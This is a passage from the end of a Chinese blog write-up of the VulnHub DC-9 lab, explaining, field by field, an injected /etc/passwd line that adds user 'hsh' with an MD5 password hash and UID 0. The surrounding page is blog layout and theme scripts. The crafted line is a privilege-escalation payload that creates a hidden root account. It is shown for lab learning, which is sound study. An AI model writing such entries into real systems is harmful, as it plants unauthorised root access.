<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">hsh:$1$hsh$TvjPz1RW6vswLzyLFta1c1:0:0::/root:/bin/bash</span><br><span class="line"></span><br><span class="line">用户名（hsh）</span><br><span class="line">表示该用户的登录名。</span><br><span class="line"></span><br><span class="line">密码占位符（$1$hsh$TvjPz1RW6vswLzyLFta1c1）</span><br><span class="line">在现代系统中，这个字段通常是密码的加密哈希值。</span><br><span class="line">$1$ 表示使用 MD5 作为加密算法。</span><br><span class="line">剩下的部分是具体的加密后的密码值。</span><br><span class="line"></span><br><span class="line">用户ID（0）</span><br><span class="line">0 是系统管理员（root）的用户ID，拥有系统的最高权限。</span><br><span class="line">组ID（0）</span><br><span class="line">0 表示用户属于 root 组。</span><br><span class="line"></span><br><span class="line">用户描述字段（空白）</span><br><span class="line">通常可以用来存储用户的全名或者其他信息，这里为空。</span><br><span class="line"></span><br><span class="line">主目录（/root）</span><br><span class="line">指定用户的主目录，/root 是系统管理员的默认主目录。</span><br><span class="line"></span><br><span class="line">默认Shell（/bin/bash）</span><br><span class="line">指定用户登录时使用的默认命令解释器（Shell），这里是 Bash Shell。</span><br></pre></td></tr></table></figure>

</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://hshdgyq.github.io">Six_plum</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://hshdgyq.github.io/2024/11/26/vulnhub-DC-9/">https://hshdgyq.github.io/2024/11/26/vulnhub-DC-9/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://hshdgyq.github.io" target="_blank">Six_plum</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/vulnhub/">vulnhub</a></div><div class="post_share"><div class="social-share" data-image="/img/background.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="next-post pull-full"><a href="/2024/11/25/vulnhub-DC-8/"><img class="next-cover" src="/img/background.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">vulnhub-DC-8</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/2024/11/12/vulnhub-DC-1/" title="vulnhub-DC-1"><img class="cover" src="/img/background.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-11-12</div><div class="title">vulnhub-DC-1</div></div></a></div><div><a href="/2024/11/14/vulnhub-DC-3/" title="vulnhub-DC-3"><img class="cover" src="/img/background.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-11-14</div><div class="title">vulnhub-DC-3</div></div></a></div><div><a href="/2024/11/13/vulnhub-DC-2/" title="vulnhub-DC-2"><img class="cover" src="/img/background.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-11-13</div><div class="title">vulnhub-DC-2</div></div></a></div><div><a href="/2024/11/20/vulnhub-DC-4/" title="vulnhub-DC-4"><img class="cover" src="/img/background.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-11-20</div><div class="title">vulnhub-DC-4</div></div></a></div><div><a href="/2024/11/20/vulnhub-DC-5/" title="vulnhub-DC-5"><img class="cover" src="/img/background.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-11-20</div><div class="title">vulnhub-DC-5</div></div></a></div><div><a href="/2024/11/21/vulnhub-DC-6/" title="vulnhub-DC-6"><img class="cover" src="/img/background.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-11-21</div><div class="title">vulnhub-DC-6</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/header.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Six_plum</div><div class="author-info__description"></div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">34</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">9</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">5</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/hshdgyq"><i class="fab fa-github"></i><span>github</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/hshdgyq" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:1952023661@qq.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">记录一些刷题日志，防止走丢。</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#vulnhub-DC-9"><span class="toc-number">1.</span> <span class="toc-text">vulnhub-DC-9</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5"><span class="toc-number">1.2.</span> <span class="toc-text">sql注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sudo%E6%8F%90%E6%9D%83"><span class="toc-number">1.3.</span> <span class="toc-text">sudo提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">1.4.</span> <span class="toc-text">总结</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2024/11/26/vulnhub-DC-9/" title="vulnhub-DC-9"><img src="/img/background.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="vulnhub-DC-9"/></a><div class="content"><a class="title" href="/2024/11/26/vulnhub-DC-9/" title="vulnhub-DC-9">vulnhub-DC-9</a><time datetime="2024-11-26T11:55:11.000Z" title="发表于 2024-11-26 19:55:11">2024-11-26</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/11/25/vulnhub-DC-8/" title="vulnhub-DC-8"><img src="/img/background.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="vulnhub-DC-8"/></a><div class="content"><a class="title" href="/2024/11/25/vulnhub-DC-8/" title="vulnhub-DC-8">vulnhub-DC-8</a><time datetime="2024-11-25T12:58:24.000Z" title="发表于 2024-11-25 20:58:24">2024-11-25</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/11/21/vulnhub-DC-7/" title="vulnhub-DC-7"><img src="/img/background.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="vulnhub-DC-7"/></a><div class="content"><a class="title" href="/2024/11/21/vulnhub-DC-7/" title="vulnhub-DC-7">vulnhub-DC-7</a><time datetime="2024-11-21T13:16:12.000Z" title="发表于 2024-11-21 21:16:12">2024-11-21</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/11/21/vulnhub-DC-6/" title="vulnhub-DC-6"><img src="/img/background.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="vulnhub-DC-6"/></a><div class="content"><a class="title" href="/2024/11/21/vulnhub-DC-6/" title="vulnhub-DC-6">vulnhub-DC-6</a><time datetime="2024-11-21T04:27:57.000Z" title="发表于 2024-11-21 12:27:57">2024-11-21</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/11/20/vulnhub-DC-5/" title="vulnhub-DC-5"><img src="/img/background.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="vulnhub-DC-5"/></a><div class="content"><a class="title" href="/2024/11/20/vulnhub-DC-5/" title="vulnhub-DC-5">vulnhub-DC-5</a><time datetime="2024-11-20T13:04:36.000Z" title="发表于 2024-11-20 21:04:36">2024-11-20</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('/img/background.jpg')"><div id="footer-wrap"><div class="copyright">&copy;2022 - 2024 By Six_plum</div><div class="footer_custom_text">I wish you to become your own sun, no need to rely on who's light.</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="is-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  数据库加载中</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div><hr/><div id="local-search-results"></div></div></div><div id="search-mask"></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><script src="/js/search/local-search.js"></script><div class="js-pjax"></div><canvas class="fireworks" mobile="false"></canvas><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/fireworks.min.js"></script><script defer="defer" id="ribbon" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-ribbon.min.js" size="150" alpha="0.6" zIndex="-1" mobile="true" data-click="true"></script><script id="canvas_nest" defer="defer" color="0,0,255" opacity="0.7" zIndex="-1" count="99" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-nest.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = true;
POWERMODE.mobile = false;
document.body.addEventListener('input', POWERMODE);
</script><script src="https://cdn.jsdelivr.net/npm/pjax/pjax.min.js"></script><script>let pjaxSelectors = ["head > title","#config-diff","#body-wrap","#rightside-config-hide","#rightside-config-show",".js-pjax"]

var pjax = new Pjax({
  elements: 'a:not([target="_blank"]):not([href="/music/"]):not([href="/no-pjax/"])',
  selectors: pjaxSelectors,
  cacheBust: false,
  analytics: false,
  scrollRestoration: false
})

document.addEventListener('pjax:send', function () {

  // removeEventListener scroll 
  window.tocScrollFn && window.removeEventListener('scroll', window.tocScrollFn)
  window.scrollCollect && window.removeEventListener('scroll', scrollCollect)

  document.getElementById('rightside').style.cssText = "opacity: ''; transform: ''"
  
  if (window.aplayers) {
    for (let i = 0; i < window.aplayers.length; i++) {
      if (!window.aplayers[i].options.fixed) {
        window.aplayers[i].destroy()
      }
    }
  }

  typeof typed === 'object' && typed.destroy()

  //reset readmode
  const $bodyClassList = document.body.classList
  $bodyClassList.contains('read-mode') && $bodyClassList.remove('read-mode')

  typeof disqusjs === 'object' && disqusjs.destroy()
})

document.addEventListener('pjax:complete', function () {
  window.refreshFn()

  document.querySelectorAll('script[data-pjax]').forEach(item => {
    const newScript = document.createElement('script')
    const content = item.text || item.textContent || item.innerHTML || ""
    Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
    newScript.appendChild(document.createTextNode(content))
    item.parentNode.replaceChild(newScript, item)
  })

  GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()

  typeof chatBtnFn === 'function' && chatBtnFn()
  typeof panguInit === 'function' && panguInit()

  // google analytics
  typeof gtag === 'function' && gtag('config', '', {'page_path': window.location.pathname});

  // baidu analytics
  typeof _hmt === 'object' && _hmt.push(['_trackPageview',window.location.pathname]);

  typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length && loadMeting()

  // prismjs
  typeof Prism === 'object' && Prism.highlightAll()
})

document.addEventListener('pjax:error', (e) => {
  if (e.request.status === 404) {
    pjax.loadUrl('/404.html')
  }
})</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><!-- 樱花特效 启用时删去下面的<!即可-->
<!<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yremp/yremp-js@1.5/sakura.js"><!</script></body></html><!<script type="text/javascript" src="\js\sakura.js"><!</script>